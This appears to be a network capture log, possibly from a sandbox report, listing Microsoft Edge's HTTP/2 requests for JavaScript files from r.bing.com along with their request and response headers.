user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:29:34 GMT
etag: 0x8DCDC6241BA29EA
akamai-grn: 0.1e8f655f.1737919511.2fdd4320
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: xl2SFLZCQEcsZUNAUSfMmA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ca734619-801e-006d-1b17-1540be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 393
cache-control: public, no-transform, max-age=46432
expires: Wed, 12 Mar 2025 15:30:55 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49f52
timing-allow-origin: *
GET

https://r.bing.com/rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:55:43 GMT
etag: 0x8DCDC5D86C3D99C
akamai-grn: 0.43367a5c.1736873630.3e71fe4
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 308
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rimZQyGjXssDEnuSlgMaJA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 52c65f3b-c01e-0007-0c4e-181c15000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=212291
expires: Fri, 14 Mar 2025 13:35:14 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49f53
timing-allow-origin: *
GET

https://r.bing.com/rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:36:19 GMT
etag: 0x8DCDC63331FF483
content-length: 312
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Ij6CMW7d9STrT+a4Nf7dFA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b58b846c-901e-001f-45b8-163180000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=59209
expires: Wed, 12 Mar 2025 19:03:52 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49f54
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:34:27 GMT
etag: 0x8DCE8C34C6E86D0
akamai-grn: 0.4bba1302.1737320433.1d69a177
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1532
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 5WRb79OLEOB99g79FkaKhA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 02bb506f-801e-006d-5ade-1a40be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=66656
expires: Wed, 12 Mar 2025 21:07:59 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fc4
timing-allow-origin: *
GET

https://r.bing.com/rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:02:01 GMT
etag: 0x8DCDC66CA2704F8
content-length: 635
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: cbryIH17LuJqgju0sWrerw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4c8af66e-001e-0033-6cab-16b3bd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=239197
expires: Fri, 14 Mar 2025 21:03:40 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fc5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/zL4sntecq0RmP6dobtS9Rd5WRvU.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/zL4sntecq0RmP6dobtS9Rd5WRvU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:41:54 GMT
etag: 0x8DCEC884215D06E
content-length: 772
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: yaTET5I1fmUKhVemn0wu5w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6927f078-601e-0067-1379-1e5937000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=343762
expires: Sun, 16 Mar 2025 02:06:25 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fc6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 07 Jan 2025 05:55:18 GMT
etag: 0x8DD2EDFDDA09D23
content-length: 7017
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: bglrfusHszJbBVCKCoDnQg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0e4c43bf-601e-004e-672b-612f75000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=111076
expires: Thu, 13 Mar 2025 09:28:19 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fc7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:17:19 GMT
etag: 0x8DCDC608BA54CA4
content-length: 462
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: fr82fvtvcsicFIwsSPlj7g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8defdcf7-101e-004a-72ef-15daf7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=86005
expires: Thu, 13 Mar 2025 02:30:28 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fca
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/9Z2GyyGvsKSVNrmOMrTfcv8z_yQ.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/9Z2GyyGvsKSVNrmOMrTfcv8z_yQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:09:17 GMT
etag: 0x8DCDC67CE093DD9
content-length: 420
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: jo9OjDEVHQbXwUo+1GLIXA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7d7c472f-d01e-0057-0ed8-16031d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=137900
expires: Thu, 13 Mar 2025 16:55:23 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fcb
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/dUzSc2TJEdHviToK914Fg1aekPA.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/dUzSc2TJEdHviToK914Fg1aekPA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:17:40 GMT
etag: 0x8DCDC6097D3561C
akamai-grn: 0.c58f655f.1737513451.1c23dac
content-length: 324
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: KixLi5xMliwEIxbNV8RpbA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b741ea4e-001e-0077-3414-1b6fd1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=64045
expires: Wed, 12 Mar 2025 20:24:28 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fcc
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/AzHQ2CGooV1DDs0SEYA1x4qElBY.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/AzHQ2CGooV1DDs0SEYA1x4qElBY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 03 Oct 2024 00:29:00 GMT
etag: 0x8DCE342607BCACB
content-length: 445
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: aOJy98NWCam5NTQEQPKVXQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 20f4ff69-d01e-003a-7671-19a933000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=362282
expires: Sun, 16 Mar 2025 07:15:05 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fcd
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:56:27 GMT
etag: 0x8DCDC66034C9278
akamai-grn: 0.3c367a5c.1734127126.11cb5b5f
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 507
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Tm502hkAmxWuxzxBM7uX9A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 55c1cc9e-e01e-0039-732a-16aa34000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=83674
expires: Thu, 13 Mar 2025 01:51:37 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fce
timing-allow-origin: *
GET

https://r.bing.com/rp/uceaWoHkRefVM5EK1cFT2TcyRm0.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/uceaWoHkRefVM5EK1cFT2TcyRm0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:51:04 GMT
etag: 0x8DCDC5CE09E00D2
content-length: 375
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: kdgVpI0X+oWcnOv0ZCUuIA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 24a5e4a3-801e-0029-2ae5-149cd2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=331841
expires: Sat, 15 Mar 2025 22:47:44 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fcf
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Nz3080e44w3456W4QiR1L5nz6Tg.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/Nz3080e44w3456W4QiR1L5nz6Tg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:28:19 GMT
etag: 0x8DCDC62149C3678
akamai-grn: 0.bf777b5c.1737403111.2394489e
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 386
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 6W4GJTTFhKoLN+eXDWPo3Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2f7b32df-801e-006d-2071-1540be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=92267
expires: Thu, 13 Mar 2025 04:14:50 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fd1
timing-allow-origin: *
GET

https://r.bing.com/rp/Xz21jpkTfbBon6hHKW7e4R7Hl0U.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/Xz21jpkTfbBon6hHKW7e4R7Hl0U.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:16:51 GMT
etag: 0x8DCDC68DCA5DDA0
akamai-grn: 0.ad777b5c.1737138716.16c2fdc8
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: wMjND6gwy3LKsXBo8Ww74w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ce25302a-c01e-002e-0401-156a57000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 481
cache-control: public, no-transform, max-age=63083
expires: Wed, 12 Mar 2025 20:08:26 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fd2
timing-allow-origin: *
GET

https://r.bing.com/rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:33:54 GMT
etag: 0x8DCE8C33887E39E
akamai-grn: 0.53ba1302.1737710314.739b7b7
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 600
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Zkzd6th/sQhbnSdzs68rIw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 17682d97-901e-0014-34e6-1a29f4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=64099
expires: Wed, 12 Mar 2025 20:25:22 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fd4
timing-allow-origin: *
GET

https://r.bing.com/rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Wed, 08 Jan 2025 12:56:27 GMT
etag: 0x8DD2FE3DD7E8554
akamai-grn: 0.ba777b5c.1737131677.f587d8c
content-length: 824
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: BDLWGhvTxTjz4dC7KRERHw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 681b365a-a01e-0058-49f4-61eeeb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=131548
expires: Thu, 13 Mar 2025 15:09:31 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fd5
timing-allow-origin: *
